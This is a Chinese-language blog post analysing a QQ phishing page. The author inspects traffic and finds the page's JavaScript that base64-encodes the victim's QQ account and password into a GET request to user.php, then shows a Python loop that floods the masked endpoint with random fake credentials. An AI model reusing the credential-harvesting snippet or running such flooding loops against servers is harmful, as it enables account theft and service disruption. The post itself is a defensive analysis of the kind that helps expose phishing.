<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="记一次对盗号网站的分析起因可能是群里面有人的号被盗了吧，QQ邮箱里面的群邮件里面突然收到了一封盗号邮件（这种盗号链接的风格肯定是能一眼看穿的吧😂）链接打了个码，第一次发博客曝光，还是有点害怕 点开链接，不得不承认，网页做的是真的像啊，我甚至有一股想输入账号密码的冲动——————————下方多GIF图预警—————————— 但是如果你点击“扫码快捷登录”的话，网页会提示“系统繁忙,请您使用QQ账">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2020/11/14/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%AF%B9%E7%9B%97%E5%8F%B7%E7%BD%91%E7%AB%99%E7%9A%84%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="记一次对盗号网站的分析起因可能是群里面有人的号被盗了吧，QQ邮箱里面的群邮件里面突然收到了一封盗号邮件（这种盗号链接的风格肯定是能一眼看穿的吧😂）链接打了个码，第一次发博客曝光，还是有点害怕 点开链接，不得不承认，网页做的是真的像啊，我甚至有一股想输入账号密码的冲动——————————下方多GIF图预警—————————— 但是如果你点击“扫码快捷登录”的话，网页会提示“系统繁忙,请您使用QQ账">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921220637648.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921220816320.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921222610200.gif#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921222129832.gif#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921222404505.gif#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921231025353.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921222910164.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921231544916.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020092122395684.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921224236794.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921224900891.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921230309995.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921230607902.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200921235826822.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
<meta property="article:published_time" content="2020-11-14T06:57:16.160Z">
<meta property="article:modified_time" content="2020-11-14T06:58:22.718Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200921220637648.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-记一次对盗号网站的分析" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/11/14/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%AF%B9%E7%9B%97%E5%8F%B7%E7%BD%91%E7%AB%99%E7%9A%84%E5%88%86%E6%9E%90/" class="article-date">
  <time datetime="2020-11-14T06:57:16.160Z" itemprop="datePublished">2020-11-14</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="记一次对盗号网站的分析"><a href="#记一次对盗号网站的分析" class="headerlink" title="记一次对盗号网站的分析"></a>记一次对盗号网站的分析</h1><h1 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h1><p>可能是群里面有人的号被盗了吧，QQ邮箱里面的群邮件里面突然收到了一封盗号邮件（这种盗号链接的风格肯定是能一眼看穿的吧😂）<br><img src="https://img-blog.csdnimg.cn/20200921220637648.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">链接打了个码，第一次发博客曝光，还是有点害怕</p>
<p>点开链接，不得不承认，网页做的是真的像啊，我甚至有一股想输入账号密码的冲动<br><img src="https://img-blog.csdnimg.cn/20200921220816320.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>——————————下方多GIF图预警——————————</p>
<p>但是如果你点击“扫码快捷登录”的话，网页会提示“系统繁忙,请您使用QQ账号密码登录！”。即使是打开链接准备输入真的账号密码的安全小白，想必到这里也能看出端倪了，扫码登录这么安全的方式，怎么可能说停用就停用呢，想必TX是不会干这种事的</p>
<p><img src="https://img-blog.csdnimg.cn/20200921222610200.gif#pic_center" alt="在这里插入图片描述"></p>
<h1 id="初步分析"><a href="#初步分析" class="headerlink" title="初步分析"></a>初步分析</h1><p>都0202年了，盗号网站也基本都有前端验证了，输入111111这种简单无脑的账号密码，或者是账号里面输入了字符，肯定是要被前端过滤了<br><img src="https://img-blog.csdnimg.cn/20200921222129832.gif#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200921222404505.gif#pic_center" alt="在这里插入图片描述"><br>好吧，那就输入一个稍微正常一点的吧，账号“88488848”，密码“pwd88488848”<br><img src="https://img-blog.csdnimg.cn/20200921231025353.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p>和以往的盗号网站一样，它获取账号密码成功之后就会跳转到一个正常的网站，不过此时账号密码信息应该已经被发送到盗号者的网站了<br><img src="https://img-blog.csdnimg.cn/20200921222910164.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<h1 id="进一步分析"><a href="#进一步分析" class="headerlink" title="进一步分析"></a>进一步分析</h1><h2 id="抓包分析"><a href="#抓包分析" class="headerlink" title="抓包分析"></a>抓包分析</h2><p>可能是我不太喜欢直接去看源码吧，一般我会先抓包分析盗号网站的行为，而且盗号网站一般用的是未加密的http，抓出来的东西也比较容易看懂<br>使用http过滤之后，却只看到了一个get方法，没看到post，难道这个网站做出来却没有给服务器发送用户输入的账号密码？我甚至有点怀疑这是一个恶作剧盗号网站了。抱着再探究一下的态度，我开始分析前端的代码<br><img src="https://img-blog.csdnimg.cn/20200921231544916.png#pic_center" alt="在这里插入图片描述"></p>
<h2 id="前端代码分析"><a href="#前端代码分析" class="headerlink" title="前端代码分析"></a>前端代码分析</h2><p>F12来一波，定位到登录按钮的位置，看看在这个页面里面的 <code>&lt;script&gt;&lt;/script&gt;</code> 部分里面有没有直接写向后台发送数据的js脚本<br><img src="https://img-blog.csdnimg.cn/2020092122395684.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200921224236794.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>看来是没有了，那就用“查看网页/框架源代码”的办法找脚本，果不其然，找到了<br><img src="https://img-blog.csdnimg.cn/20200921224900891.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>201行的<code>/*新增密码校验*/</code>就写的很真实😂<br>最核心的代码就是218-220行的这些了</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$.get(<span class="string">&quot;../user.php?web=&quot;</span> + <span class="keyword">new</span> <span class="built_in">Date</span>().getTime() + <span class="string">&quot;&amp;token=&quot;</span> + btoa(<span class="string">&#x27;&#123;&quot;u&quot;:&#x27;</span> + u + <span class="string">&#x27;,&quot;p&quot;:&quot;&#x27;</span> + p + <span class="string">&#x27;&quot;&#125;&#x27;</span>),<span class="function"><span class="keyword">function</span>(<span class="params">data,status</span>)</span>&#123;</span><br><span class="line">		<span class="built_in">window</span>.top.location.href = data.url;</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>有趣的是，这个网页没用post方法，而是用get和传参的方式向后台传送数据，这就是为什么在抓包结果里面只能看到一个GET和HTTP 200 OK，但是看不到POST方法的原因了</p>
<p>分析代码可以看出，<code>new Date().getTime()</code>只是获取了当前时间，而这个<code>&quot;&amp;token=&quot;</code>后面的东西应该就是重点内容了，这个命名为<code>u</code>和<code>p</code>的变量是不是很会令人联想到user和password呢，目前来看恐怕就是了，用chrome的抓包看一下吧<br><img src="https://img-blog.csdnimg.cn/20200921230309995.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>token的内容是<code> eyJ1Ijo4ODQ4ODg0OCwicCI6InB3ZDg4NDg4ODQ4In0=</code>，根据这个显眼的结尾等号以及前面js脚本中<code>btoa</code>函数的使用，看了这个盗号者居然给用户的信息用base64简单的加了个密😂，解码看看内容吧<br><img src="https://img-blog.csdnimg.cn/20200921230607902.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><strong>果不其然，被加密的内容就是我们刚才输入的用户名和密码！</strong></p>
<h1 id="结果"><a href="#结果" class="headerlink" title="结果"></a>结果</h1><p>至此，我们已经知道了这个盗号网站的IP地址（图中均已打码）以及它向后台传送数据的格式和方法。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx.cn&#x2F;user.php?web&#x3D;[当前时间戳]&amp;token&#x3D;[base64加密的&#123;&quot;u&quot;:账号,&quot;p&quot;:&quot;密码&quot;&#125;]</span><br></pre></td></tr></table></figure>

<p>由于个人能力有限，目前我能做的就是用Python写点脚本给网站灌输一些垃圾数据</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> datetime</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://xxxxxx/user.php?&#x27;</span></span><br><span class="line">b=<span class="number">0</span></span><br><span class="line">j=<span class="number">1</span></span><br><span class="line">s = <span class="string">&quot;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&amp;*&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> b&lt;<span class="number">1</span>:</span><br><span class="line">    t = time.time()</span><br><span class="line">    <span class="comment"># print (int(round(t * 1000))) </span></span><br><span class="line"></span><br><span class="line">    fakeId = <span class="string">&quot;&quot;</span></span><br><span class="line">    fakePwd = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):    </span><br><span class="line">        fakeId+=str(random.randint(<span class="number">0</span>,<span class="number">9</span>))</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">12</span>):</span><br><span class="line">        fakePwd += s[random.randint(<span class="number">0</span>,len(s)<span class="number">-1</span>)]</span><br><span class="line">    print(<span class="string">&quot;FakeId &quot;</span>+fakeId)</span><br><span class="line">    print(<span class="string">&quot;FakePwd &quot;</span>+fakePwd)</span><br><span class="line"></span><br><span class="line">    up = <span class="string">&quot;&#123;\&quot;u\&quot;:&quot;</span>+fakeId+<span class="string">&quot;,\&quot;p\&quot;:\&quot;&quot;</span>+fakePwd+<span class="string">&quot;\&quot;&#125;&quot;</span></span><br><span class="line">    bytes_up = up.encode(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line">    userData = base64.b64encode(bytes_up)</span><br><span class="line">    userData = userData.decode(<span class="string">&quot;utf-8&quot;</span>)</span><br><span class="line">    print(<span class="string">&quot;userDataB64 &quot;</span>+userData)</span><br><span class="line"></span><br><span class="line">    newUrl=url+<span class="string">&quot;web=&quot;</span>+str(round(t * <span class="number">1000</span>))+<span class="string">&quot;&amp;token=&quot;</span>+userData</span><br><span class="line">    response=requests.get(newUrl)</span><br><span class="line"></span><br><span class="line">    print(<span class="string">&#x27;次数：&#x27;</span>+str(j)+<span class="string">&#x27; &#x27;</span>+newUrl+<span class="string">&#x27; &#x27;</span>+str(response))</span><br><span class="line">    j+=<span class="number">1</span></span><br><span class="line"></span><br><span class="line">print(<span class="string">&quot;!RUN FINISHED!&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>运行截图</p>
<p><img src="https://img-blog.csdnimg.cn/20200921235826822.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhbG96aHk=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2020/11/14/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%AF%B9%E7%9B%97%E5%8F%B7%E7%BD%91%E7%AB%99%E7%9A%84%E5%88%86%E6%9E%90/" data-id="ckhhcfnkj0000i81t75nicr8p" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/11/14/%E8%AE%B0%E4%B8%80%E6%AC%A1%E5%AF%B9%E7%9B%97%E5%8F%B7%E7%BD%91%E7%AB%99%E7%9A%84%E5%88%86%E6%9E%90/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>